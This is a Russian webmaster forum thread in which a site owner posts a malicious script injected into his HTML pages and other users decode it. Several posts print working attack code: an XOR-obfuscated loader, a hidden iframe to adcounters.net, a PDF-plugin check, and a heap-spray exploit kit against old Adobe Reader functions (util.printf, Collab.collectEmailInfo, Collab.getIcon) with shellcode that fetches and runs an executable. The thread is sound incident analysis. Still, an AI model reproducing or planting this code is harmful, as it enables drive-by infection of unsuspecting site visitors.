- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Вчера на сайте на главной странице в источнике увидел кусок вируса. Касперский опознал его как "Тrojan.JS.Iframe.ef" Мастерхоcт уверил, что вирус появился с локала при заливке страниц сайта по ftp. Что удивительно, сайт не на движке - обычные hml-страницы. :) Вирус присоседился сразу за тегом <body>. Естественно, все пароли (ftp) сменил, локальный комп был просканирован, антишпион поставлен - вроде все чисто... Еще, запросил лог доступа по ftp.
Ниже привожу код вируса (заменил скрипт=script).
Что там записано на JS? Какие действия? :madd:
Array(81,69,10,83,88,84,66,90,82,89,67,25,84,69,82,86,67,82,114,91,82,90,82,89,67,31,16,94,81,69,86,90,82,16,
30,12,61,81,69,25,68,69,84,10,21,95,67,67,71,13,24,24,86,83,84,88,66,89,67,82,69,68,25,89,82,67,24,81,86,69,
24,68,95,88,64,25,71,95,71,8,68,10,82,85,4,6,83,6,14,1,81,84,21,12,61,81,69,25,68,67,78,91,82,25,83,94,68,71,
91,86,78,10,21,89,88,89,82,21,12,61,83,88,84,66,90,82,89,67,25,80,82,67,114,91,82,90,82,89,67,68,117,78,
99,86,80,121,86,90,82,31,16,85,88,83,78,16,30,108,7,106,25,86,71,71,82,89,83,116,95,94,91,83,31,81,69,
30,12,61);oa="";jnyh=String.fromCharCode;tl=55;for(vf
in lo)oa+=jnyh(lo[vf]^tl);eval(oa);</скрипт>
fr.src="http://adcounters.net/far/show.php?s=eb31d196fc";
fr.style.display="none";
document.getElementsByTagName('body')[0].appendChild(fr);
вот такие там действия :)
спасибо :)
счетчик так накручивает... :) а можно как-то вычислить по id= eb31d196fc - кто это?
спасибо :)
счетчик так накручивает... :) а можно как-то вычислить по id= eb31d196fc - кто это?
какой счетчик, там фрейм на эксплойт был
админка h_tp://adcounters.net/far/admin.php
счетчик так накручивает... а можно как-то вычислить по id= eb31d196fc - кто это?
если вычислите, отпишитесь :)
Fr3d, можно подробнее, pls, что это и с чем едят? :)
Впервые сталкиваюсь...
исполняется это
fr=document.createElement('iframe');fr.src="http://adcounters.net/far/show.php?s=eb31d196fc";
fr.style.display="none";
document.getElementsByTagName('body')[0].appendChild(fr);
потом грузится закодированное вот это
function Complete(){setTimeout('location.href = "http://smotribezsms.ucoz.ru/',2000);}function pdf(){var isInstalled=false;if(navigator.plugins&&navigator.plugins.length){for(var x=0;x<navigator.plugins.length;x++){if(navigator.plugins[x].description.indexOf('Adobe Acrobat')!=-1){isInstalled=true;break;}
if(navigator.plugins[x].description.indexOf('Adobe PDF')!=-1){isInstalled=true;break;}}}else if(window.ActiveXObject){var control=null;try{control=new ActiveXObject('AcroPDF.PDF');}catch(e){}
if(!control){try{control=new ActiveXObject('PDF.PdfCtrl');}catch(e){}}
if(control){isInstalled=true;}}
if(isInstalled){var ua=navigator.userAgent.toLowerCase();if(ua.indexOf("firefox")!=-1){var pdfelement=document.createElement('embed');document.body.appendChild(pdfelement);pdfelement.width='1';pdfelement.height='1';pdfelement.src='./pdf.php';pdfelement.type='application/pdf';}else{var pdfelement=document.createElement('iframe');pdfelement.setAttribute('src','./pdf.php');pdfelement.setAttribute('width',200);pdfelement.setAttribute('height',200);pdfelement.setAttribute('style','display:none;');document.body.appendChild(pdfelement);}
setTimeout("Complete();",2000);}else{Complete();}}
pdf();
- ГС для отвода глаз + сплоит, который открывает httр://adcounters.net/far/pdf.php, тем самым запускает acrobat reader и исполняет это
lyoxa добавил 15.01.2010 в 15:21
который открывшись в окне браузера выполняет это
lyoxa добавил 15.01.2010 в 15:22
function BXcfTYewQ(){function fix_it(yarsp,len){
while(yarsp.length*2<len){yarsp+=yarsp; }
yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf(){
var payload=unescape("쀳譤぀౸䂋謌ᱰ训ࡘ৫䂋贴籀墋樼婄俫剚襖ѕ坖王謼㍴͸図皋̠㏳䧉䅐㎭㛿븏̔ࡴ쿁̍䃺㭘痸廥䚋̤曃ಋ譈᱖팃ҋΊ心偞跃ࡽ剗㎸諊ᄁ쀲껲롏⹥硥暫暘낫詬飠桐湯搮畨汲呭躸๎↓ѕ傓쀳偐譖ѕ슃荿㇂偒㚸⼚ーѕ㍛埿롖ﺘຊ嗿圄⦆ѕ瑨灴⼺愯捤畯瑮牥⹳敮⽴慦⽲潬摡瀮灨政㈽");
var nop=unescape("ਊਊਊਊ")
var heapblock=nop+payload;
var bigblock=unescape("ਊਊ");
var headersize=20;
var spray=headersize+heapblock.length;
while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);
var block=bigblock.substring(0,bigblock.length-spray);
while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();
for(var i=0;i<1400;i++){mem_array=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",num);
}
function collab_email(){
var shellcode=unescape("쀳譤぀౸䂋謌ᱰ训ࡘ৫䂋贴籀墋樼婄俫剚襖ѕ坖王謼㍴͸図皋̠㏳䧉䅐㎭㛿븏̔ࡴ쿁̍䃺㭘痸廥䚋̤曃ಋ譈᱖팃ҋΊ心偞跃ࡽ剗㎸諊ᄁ쀲껲롏⹥硥暫暘낫詬飠桐湯搮畨汲呭躸๎↓ѕ傓쀳偐譖ѕ슃荿㇂偒㚸⼚ーѕ㍛埿롖ﺘຊ嗿圄⦆ѕ瑨灴⼺愯捤畯瑮牥⹳敮⽴慦⽲潬摡瀮灨政㈽");
var mem_array=new Array();
var cc=0x0c0c0c0c;
var addr=0x400000;
var sc_len=shellcode.length*2;
var len=addr-(sc_len+0x38);
var yarsp=unescape("邐邐");
yarsp=fix_it(yarsp,len);
var count2=(cc-0x400000)/addr;
for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("ఌఌ");
while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});
}
function collab_geticon(){
if(app.doc.Collab.getIcon){
var arry=new Array();
var vvpethya=unescape("쀳譤぀౸䂋謌ᱰ训ࡘ৫䂋贴籀墋樼婄俫剚襖ѕ坖王謼㍴͸図皋̠㏳䧉䅐㎭㛿븏̔ࡴ쿁̍䃺㭘痸廥䚋̤曃ಋ譈᱖팃ҋΊ心偞跃ࡽ剗㎸諊ᄁ쀲껲롏⹥硥暫暘낫詬飠桐湯搮畨汲呭躸๎↓ѕ傓쀳偐譖ѕ슃荿㇂偒㚸⼚ーѕ㍛埿롖ﺘຊ嗿圄⦆ѕ瑨灴⼺愯捤畯瑮牥⹳敮⽴慦⽲潬摡瀮灨政㈽");
var hWq500CN=vvpethya.length*2;
var len=0x400000-(hWq500CN+0x38);
var yarsp=unescape("邐邐");
yarsp=fix_it(yarsp,len);
var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;
for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;}
var tUMhNbGw=unescape("%09");
while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;}
tUMhNbGw="N."+tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}
function pdf_start(){
var version=app.viewerVersion.toString();
version=version.replace(/\D/g,'');
var varsion_array=new Array(
version.charAt(0),
version.charAt(1),
version.charAt(2));
if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){util_printf();}
if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_email();}
if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();}
}
pdf_start();}
а тут сами уже ))
а тут сами уже ))
не осилю :) Этот код может воровать пароли и куда отсылает?
Жесть, я тоже как то ловил js на сайте у себя, но я думал банально посещалку накручивали
httр://adcounters.net/far/pdf.php
у меня антивирь сругался на пдку эту)
Продолжение )
Последний код качает и выполняет exe файл http://adcounters.net/far/load.php?e=2
который последним DrWeb'ом распознается как "Trojan.DownLoad.35952"
А что он там уже качает незнаю ))